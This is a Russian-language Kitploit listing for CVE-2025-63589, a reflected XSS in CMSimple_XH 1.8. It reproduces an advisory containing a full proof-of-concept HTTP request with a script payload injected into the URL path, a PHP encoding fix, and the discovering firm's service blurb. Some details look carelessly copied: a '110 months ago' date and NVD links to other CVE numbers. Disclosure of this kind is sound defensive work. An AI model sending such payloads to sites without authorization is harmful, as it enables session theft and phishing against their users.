Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-63589 — Отраженный XSS proof-of-concept для CMSimple_XH 1.8 с неаутентифицированной инъекцией скриптов через несанитизированные сегменты пути, включая оценку CVSS 6.1 и пример исправления на PHP. | Kitploit
Инструменты/GitHubGitHub/cybercrewinc/cve-2025-63589
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubcybercrewinc/cve-2025-63589

CVE-2025-63589

Отраженный XSS proof-of-concept для CMSimple_XH 1.8 с неаутентифицированной инъекцией скриптов через несанитизированные сегменты пути, включая оценку CVSS 6.1 и пример исправления на PHP.

Репозиторий
110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-63589 Отражённый XSS при обработке пути index.php в CMSimple_XH

Обнаружено: 6 октября 2025 г.
Продукт: CMSimple_XH (CMS на плоских файлах с открытым исходным кодом)
Затронутые версии: 1.8 CVE: CVE-2025-63589 Требуется аутентификация: Не требуется (без аутентификации)
Тип атаки: Отражённый межсайтовый скриптинг (XSS)
Оценочный CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Средний)

Фронт-контроллер в index.php принимает динамические сегменты пути (используемые для маршрутизации к шаблонам/страницам) и передаёт эти значения в рендеринг шаблонов. Код не выполняет надлежащую санитизацию и HTML-кодирование этих сегментов пути перед вставкой в атрибуты и href якорей. В результате специально сформированный URI запроса, содержащий такие символы, как ">, и внедрённые теги (например, <script>...</script>), без изменений отражается в HTML-вывод и выполняется браузером.

Типичные точки отражения включают:

  • Атрибуты action форм (например, формы входа/поиска)
  • Атрибуты href пунктов навигации/меню
  • Хлебные крошки / навигация-локатор (<nav class="locator">)
  • Ссылки в подвале (Print view, Sitemap, Login и т. д.)

Поскольку входные данные попадают в контексты HTML-атрибутов и содержимое якорей, требуется стандартное кодирование атрибутов, но оно отсутствует.

Подтверждение концепции (PoC)

Запрос:

root@kitploit:~
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32

search=Search...&function=search
Pasted image 20251006203832

Ответ:

Pasted image 20251006203959
Pasted image 20251006204254

Внедрённая полезная нагрузка gjtqw"><script>alert(1)</script>co2cu без кодирования отражается в ссылки меню, хлебные крошки, атрибут action формы поиска и ссылки подвала, что приводит к выполнению скрипта при рендеринге страницы.

Предлагаемый пример PHP для безопасного вывода атрибута action:

root@kitploit:~
$safe_segment = rawurlencode($segment);              // path-safety
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';

Воздействие

  • Выполнение кода на стороне клиента (запуск произвольного JS в браузерах жертв)
  • Раскрытие информации (чтение DOM, эксфильтрация доступных клиенту cookie/токенов)
  • Перехват сессии / подмена пользователя, если токены сессии доступны из JS (не HttpOnly)
  • Подделка интерфейса / фишинг (отображение поддельных форм входа или поддельных страниц)
  • Принудительные действия, выполняемые с использованием аутентифицированной сессии жертвы

Авторы

Присвоенный CVE: CVE-2025-63589

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

Обнаружил: 株式会社CyberCrew / サイバークル

Ссылки

https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php

https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ Контакты

По любым вопросам и предложениям, пожалуйста, обращайтесь к нам.


🏢 株式会社CyberCrew

G1@4x

📞 Тел.: 03-6853-5823
📧 Эл. почта: [email protected]


📄 О компании

ПунктСодержание
Название компании株式会社CyberCrew
Адрес1-18-13 Сотоканда, Тиёда-ку, Токио, Акихабара Дайбиру, 6-й этаж

🔐 Основные услуги

🛡️ Аудит безопасности и оценка рисков

Проводим многосторонний анализ уязвимостей организации и предлагаем оптимальные меры по их устранению.

💻 Тестирование на проникновение

Выполняем целевые и сценарные тесты, включая LLM-пентесты.

🌒 Мониторинг даркнета

Раннее обнаружение утечек конфиденциальной информации и оперативное реагирование.

🎯 Red Team-учения и социальная инженерия

Оценка защищённости на основе практических сценариев атак.

🧠 Проектирование безопасных систем и консалтинг

Помогаем закладывать безопасность в проект с ранних этапов разработки.


🌐 Официальный сайт: https://www.cybercrew.co.jp
🕒 CyberCrew — ваш надёжный партнёр в области безопасности.

Скачать инструмент